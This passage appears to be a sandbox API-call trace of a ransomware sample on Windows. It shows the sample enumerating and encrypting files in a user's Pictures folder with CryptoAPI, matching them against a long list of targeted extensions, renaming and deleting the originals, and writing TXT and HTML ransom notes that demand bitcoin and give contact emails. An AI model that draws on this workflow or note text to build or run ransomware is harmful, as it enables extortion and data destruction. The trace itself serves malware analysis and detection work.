	[0196.456] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif")) returned 1
	[0196.459] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\z2radgjxb42cwjf.gif")) returned 0
	[0196.459] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389dabb0, ftCreationTime.dwHighDateTime=0x1d96bff, ftLastAccessTime.dwLowDateTime=0xc142670, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0xc142670, ftLastWriteTime.dwHighDateTime=0x1d9759e, nFileSizeHigh=0x0, nFileSizeLow=0x1471, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmMCFT1RdU.png", cAlternateFileName="_E-NMM~1.PNG")) returned 1
	[0196.459] lstrcmpW (lpString1="_e-nmMCFT1RdU.png", lpString2="..") returned 1
	[0196.459] lstrcmpW (lpString1="_e-nmMCFT1RdU.png", lpString2=".") returned 1
	[0196.459] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.459] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="_e-nmMCFT1RdU.png" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\_e-nmMCFT1RdU.png") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\_e-nmMCFT1RdU.png"
	[0196.459] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\_e-nmMCFT1RdU.png") returned 48
	[0196.460] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.460] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\_e-nmMCFT1RdU.png", cchLength=0x30 | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png") returned 0x30
	[0196.460] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.460] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.460] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png") returned="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png"
	[0196.460] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png") returned 48
	[0196.460] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.461] StrStrW (lpFirst=".png", lpSrch=".") returned=".png"
	[0196.461] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.461] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.461] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.461] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.462] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.462] ReadFile (in: hFile=0x384, lpBuffer=0xfda128, nNumberOfBytesToRead=0x1471, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfda128*, lpNumberOfBytesRead=0x18c060*=0x1471, lpOverlapped=0x0) returned 1
	[0196.507] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.508] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb7f8) returned 1
	[0196.510] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.511] CryptCreateHash (in: hProv=0xfcb7f8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.511] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.511] CryptDeriveKey (in: hProv=0xfcb7f8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.511] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.511] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x1471, dwBufLen=0x1471 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x1480) returned 1
	[0196.512] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.512] RtlMoveMemory (in: Destination=0xfdb5a8, Source=0xfda128, Length=0x1471 | out: Destination=0xfdb5a8) 
	[0196.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.512] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfdb5a8*, pdwDataLen=0x18bc0c*=0x1471, dwBufLen=0x1480 | out: pbData=0xfdb5a8*, pdwDataLen=0x18bc0c*=0x1480) returned 1
	[0196.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.512] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.512] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.513] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.513] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.513] CryptReleaseContext (hProv=0xfcb7f8, dwFlags=0x0) returned 1
	[0196.513] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.513] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.514] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.514] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.515] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 90
	[0196.515] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.516] WriteFile (in: hFile=0x2c0, lpBuffer=0xfdb5a8*, nNumberOfBytesToWrite=0x1480, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfdb5a8*, lpNumberOfBytesWritten=0x18c068*=0x1480, lpOverlapped=0x0) returned 1
	[0196.519] CloseHandle (hObject=0x2c0) returned 1
	[0196.519] CloseHandle (hObject=0x384) returned 1
	[0196.520] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png")) returned 1
	[0196.523] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\_e-nmmcft1rdu.png")) returned 0
	[0196.523] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389dabb0, ftCreationTime.dwHighDateTime=0x1d96bff, ftLastAccessTime.dwLowDateTime=0xc142670, ftLastAccessTime.dwHighDateTime=0x1d9759e, ftLastWriteTime.dwLowDateTime=0xc142670, ftLastWriteTime.dwHighDateTime=0x1d9759e, nFileSizeHigh=0x0, nFileSizeLow=0x1471, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_e-nmMCFT1RdU.png", cAlternateFileName="_E-NMM~1.PNG")) returned 0
	[0196.524] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 1
	[0196.524] FindClose (in: hFindFile=0xfb9830 | out: hFindFile=0xfb9830) returned 0
	[0196.524] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures"
	[0196.524] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\*.*"
	[0196.524] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.525] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.525] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 58
	[0196.525] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0196.529] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0196.529] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0196.532] CloseHandle (hObject=0x380) returned 1
	[0196.532] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.533] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.533] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0196.535] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0196.535] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0196.535] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0196.535] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0196.535] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0196.536] CloseHandle (hObject=0x380) returned 1
	[0196.536] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.536] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.537] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0196.537] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 59
	[0196.537] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0196.540] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0196.540] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0196.583] CloseHandle (hObject=0x380) returned 1
	[0196.584] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.584] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.585] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.585] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0196.586] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0196.586] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0196.587] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0196.587] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0196.587] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0196.589] CloseHandle (hObject=0x380) returned 1
